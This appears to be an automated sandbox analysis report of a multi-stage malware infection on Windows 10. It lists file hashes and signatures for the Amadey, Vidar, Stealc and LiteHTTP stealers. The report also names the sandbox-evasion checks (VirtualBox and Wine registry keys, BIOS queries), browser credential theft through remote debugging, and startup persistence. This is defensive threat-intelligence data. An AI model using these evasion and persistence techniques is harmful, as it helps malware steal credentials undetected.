SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

memory/2700-1417-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/2700-1416-0x000000001B760000-0x000000001BA42000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TIX5S8JMV45WF1LMVNMW.temp

MD5 0955ae287b007e033d5c67b8848ec5f3
SHA1 fcd91eb9674311d533b47dd8e6da2b4d6a16010a
SHA256 ea36c6ce9ed55a212ea9134e20ed7647186f2f290985d737acbbf25a3bb7dbff
SHA512 55e26f14fb357b796df0175bc91adb2745838630ff0637cbba9951ec33ab088cbd964eacfefb80b665f0b981bbebef78b36ed439d6280a165b0892998ce2470a

memory/3668-1426-0x00000000021D0000-0x00000000021D8000-memory.dmp

memory/3668-1425-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\vcruntime140.dll

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\GHDHJEBFBFHJECAKFCAAKEGHDB

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe

MD5 35ed5fa7bd91bb892c13551512cf2062
SHA1 20a1fa4d9de4fe1a5ad6f7cdd63c1f2dee34d12c
SHA256 1e6929de62071a495e46a9d1afcdf6ec1486867a220457aacfdfa5a6b6ff5df4
SHA512 6b8acda217f82bd4b2519bc089f05cfbdff654b2556db378cf8344972de33d63c11f4713b2b342b3cb6e333c59517448995c33d739f72fdf00e8a81d46bd8483

memory/2304-1463-0x000000001B540000-0x000000001B822000-memory.dmp

memory/2304-1464-0x0000000002380000-0x0000000002388000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Extension Scripts\000016.dbtmp

MD5 edd71dd3bade6cd69ff623e1ccf7012d
SHA1 ead82c5dd1d2025d4cd81ea0c859414fbd136c8d
SHA256 befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
SHA512 7fa9b9ef95db0ce461de821f0dec1be8147095680b7879bad3c5752692294f94ebc202b85577b5abac9aeaf48371595dd61792786a43c0bd9b36c9fc3752669d

C:\Users\Admin\AppData\Local\Temp\10109700101\8dbc0f59a8.exe

MD5 48a07a3438055390281dcea11fe86e90
SHA1 af22b9a40f71849e9d0694e6ecd4ecd043e654a5
SHA256 28550c917bb7422d27e0d2d84dacccb72fd2b976ffe9427533c4b78d0b8bcd3b
SHA512 8799bd27796cc5d29d35e4855c2dd58e5a008efbad3e32bc3750e8808a2a116859bf3be36f8b1610e3d597b8356c0882055e304b13d274156cebc4c36a3af6d5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000019.dbtmp

MD5 e5ad213c1d147e06198eec1980e7d918
SHA1 8169b54541b0613052e7dfbdb27ded2d89c26632
SHA256 300feb3870e7d5e43b28bd6b7826d9e0c21e0e81ac1b44e9c4e35957ad0fa023
SHA512 326fa42ae471094fcddb19198fead059669f457b81aa462d93c83df47102c664bd6d4c83f069c0da06450e971ee62efe8d22a2db5aaff356a2a5591455dfd8ec

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\shared_proto_db\metadata\000020.dbtmp

MD5 a874f3e3462932a0c15ed8f780124fc5
SHA1 966f837f42bca5cac2357cff705b83d68245a2c2
SHA256 01bd196d6a114691ec642082ebf6591765c0168d4098a0cd834869bd11c8b87d
SHA512 382716d6fc0791ca0ccfa1efba318cff92532e04038e9b9aa4c27447ac2cac26c79da8ee7dbafae63278df240f0a8cab5efea2ee34eef2e54e884784147e6d00

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ff78e07e5c40c40cb14778a813de7517
SHA1 2069d8feb2f2e01ae1afedc85ff51bfe75478c4c
SHA256 218e619c6ddc19645b754e866fee589c2ee7cc8e92ab05b821a3621593195602
SHA512 cdcb9c240d58e150921949adcc7be860dfb43b120b95f223226f2eb1e8ff60f1e210e2c52f1be1fa05cc98f4cde04b212cb70d0bddb8e69dbe2913d5e418d01e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\818b1e32-53d7-47e2-b0df-87171577c0f1.tmp

MD5 3c2114872945ebe9226187663761ad7d
SHA1 60af65f4c7b2bcf9561e1d1f7f890cd2d78e1cb4
SHA256 9cf6ff94cb9c30aa3b4a0e32c561d0decd74399fc0134d485cb5ffd1a3a69cec
SHA512 36b97b6d87ef0bed833c30c1af06b29100f79e6aa639561e0331fd019699deaedaa1291e8d23dfa1d2fe0a2dcb4c50b1850346ee54979ae0f20cfcaa38e692ed

C:\Users\Admin\AppData\Local\Temp\10109710101\363d0d5258.exe

MD5 17b983576a1751e79cb8d986714efcb8
SHA1 6d1a511084444b61a995002da24e699d3ce75491
SHA256 9dfc84a90a39d5fd6cbdb39991d4696f1bc5eef5e833f6e9d8035e0dceecd11b
SHA512 2e5f481032936483a5de8fe5f6dde02f06db388132870563134826afd15346579661cfe3252fe1f98f6911b0a15a21066af7fb71208a2c1e50b5bcc6ac174ff8

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 03:14

Reported

2025-03-06 03:17

Platform

win10v2004-20250217-en

Max time kernel

148s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Stealc

stealer stealc

Stealc family

stealc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109730101\8d18e96742.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempEJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109700101\779cd54bf7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109710101\018c971c45.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempEJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109730101\8d18e96742.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109710101\018c971c45.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109730101\8d18e96742.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109700101\779cd54bf7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109710101\018c971c45.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109700101\779cd54bf7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempEJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10109610101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10109680101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109460101\a4f9d6c063.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempEJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109610101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109620101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109680101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109700101\779cd54bf7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109710101\018c971c45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109720101\9de4ffc43e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109720101\9de4ffc43e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109730101\8d18e96742.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109700101\779cd54bf7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
